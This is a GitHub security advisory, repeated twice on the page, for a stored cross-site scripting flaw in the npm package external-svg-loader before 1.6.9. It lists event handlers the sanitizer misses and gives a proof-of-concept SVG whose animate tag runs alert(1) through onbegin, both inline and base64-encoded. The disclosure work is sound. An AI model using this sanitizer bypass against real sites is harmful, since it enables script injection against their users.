Headline
GHSA-xc2r-jf2x-gjr8: external-svg-loader Cross-site Scripting vulnerability
Summary
According to the docs, svg-loader will strip all JS code before injecting the SVG file for security reasons but the input sanitization logic is not sufficient and can be trivially bypassed. This allows an attacker to craft a malicious SVG which can result in XSS.
Details
When trying to sanitize the svg the lib removes event attributes such as onmouseover, onclick but the list of events is not exhaustive. Here’s a list of events not removed by svg-loader.
onafterscriptexecute, onbeforecopy, onbeforecut, onbeforescriptexecute, onbeforetoggle, onbegin, onbounce, onend, onfinish, onfocusin, onfocusout, onmousewheel, onpointerrawupdate, onrepeat, onsearch, onshow, onstart, ontoggle(popover), ontouchend, ontouchmove, ontouchstart
As you can see in the POC we can use onbegin in animate tag to execute JS code without needing to add data-js="enabled".
PoC
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<animate onbegin=alert(1) attributeName=x dur=1s>
</svg>
<html>
<head>
<script src="./dist/svg-loader.js" type="text/javascript"></script>
</head>
<body>
<svg data-src="data:image/svg+xml;base64,PHN2ZyB2ZXJzaW9uPSIxLjEiIGJhc2VQcm9maWxlPSJmdWxsIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPgogIDxwb2x5Z29uIGlkPSJ0cmlhbmdsZSIgcG9pbnRzPSIwLDAgMCw1MCA1MCwwIiBmaWxsPSIjMDA5OTAwIiBzdHJva2U9IiMwMDQ0MDAiLz4KICA8YW5pbWF0ZSBvbmJlZ2luPWFsZXJ0KDEpIGF0dHJpYnV0ZU5hbWU9eCBkdXI9MXM+Cjwvc3ZnPgo="></svg>
</body>
</html>
Impact
Any website which uses external-svg-loader and allows its users to provide svg src, upload svg files would be susceptible to stored XSS attack.
- GitHub Advisory Database
- GitHub Reviewed
- CVE-2023-40013
external-svg-loader Cross-site Scripting vulnerability
Critical severity GitHub Reviewed Published Aug 14, 2023 in shubhamjain/svg-loader • Updated Aug 14, 2023
Package
npm external-svg-loader (npm)
Affected versions
< 1.6.9
Summary
According to the docs, svg-loader will strip all JS code before injecting the SVG file for security reasons but the input sanitization logic is not sufficient and can be trivially bypassed. This allows an attacker to craft a malicious SVG which can result in XSS.
Details
When trying to sanitize the svg the lib removes event attributes such as onmouseover, onclick but the list of events is not exhaustive. Here’s a list of events not removed by svg-loader.
onafterscriptexecute, onbeforecopy, onbeforecut, onbeforescriptexecute, onbeforetoggle, onbegin, onbounce, onend, onfinish, onfocusin, onfocusout, onmousewheel, onpointerrawupdate, onrepeat, onsearch, onshow, onstart, ontoggle(popover), ontouchend, ontouchmove, ontouchstart
As you can see in the POC we can use onbegin in animate tag to execute JS code without needing to add data-js="enabled".
PoC
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <animate onbegin=alert(1) attributeName=x dur=1s> </svg>
<html> <head> <script src="./dist/svg-loader.js" type="text/javascript"></script> </head> <body> <svg data-src="data:image/svg+xml;base64,PHN2ZyB2ZXJzaW9uPSIxLjEiIGJhc2VQcm9maWxlPSJmdWxsIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPgogIDxwb2x5Z29uIGlkPSJ0cmlhbmdsZSIgcG9pbnRzPSIwLDAgMCw1MCA1MCwwIiBmaWxsPSIjMDA5OTAwIiBzdHJva2U9IiMwMDQ0MDAiLz4KICA8YW5pbWF0ZSBvbmJlZ2luPWFsZXJ0KDEpIGF0dHJpYnV0ZU5hbWU9eCBkdXI9MXM+Cjwvc3ZnPgo="></svg> </body> </html>
Impact
Any website which uses external-svg-loader and allows its users to provide svg src, upload svg files would be susceptible to stored XSS attack.
References
- GHSA-xc2r-jf2x-gjr8
- https://nvd.nist.gov/vuln/detail/CVE-2023-40013
- shubhamjain/svg-loader@d3562fc
- https://github.com/shubhamjain/svg-loader/blob/main/svg-loader.js#L125-L128
- https://github.com/shubhamjain/svg-loader/tree/main#2-enable-javascript
Published to the GitHub Advisory Database
Aug 14, 2023
Last updated
Aug 14, 2023
Related news
SVG Loader is a javascript library that fetches SVGs using XMLHttpRequests and injects the SVG code in the tag's place. According to the docs, svg-loader will strip all JS code before injecting the SVG file for security reasons but the input sanitization logic is not sufficient and can be trivially bypassed. This allows an attacker to craft a malicious SVG which can result in Cross-site Scripting (XSS). When trying to sanitize the svg the lib removes event attributes such as `onmouseover`, `onclick` but the list of events is not exhaustive. Any website which uses external-svg-loader and allows its users to provide svg src, upload svg files would be susceptible to stored XSS attack. This issue has been addressed in commit `d3562fc08` which is included in releases from 1.6.9. Users are advised to upgrade. There are no known workarounds for this vulnerability.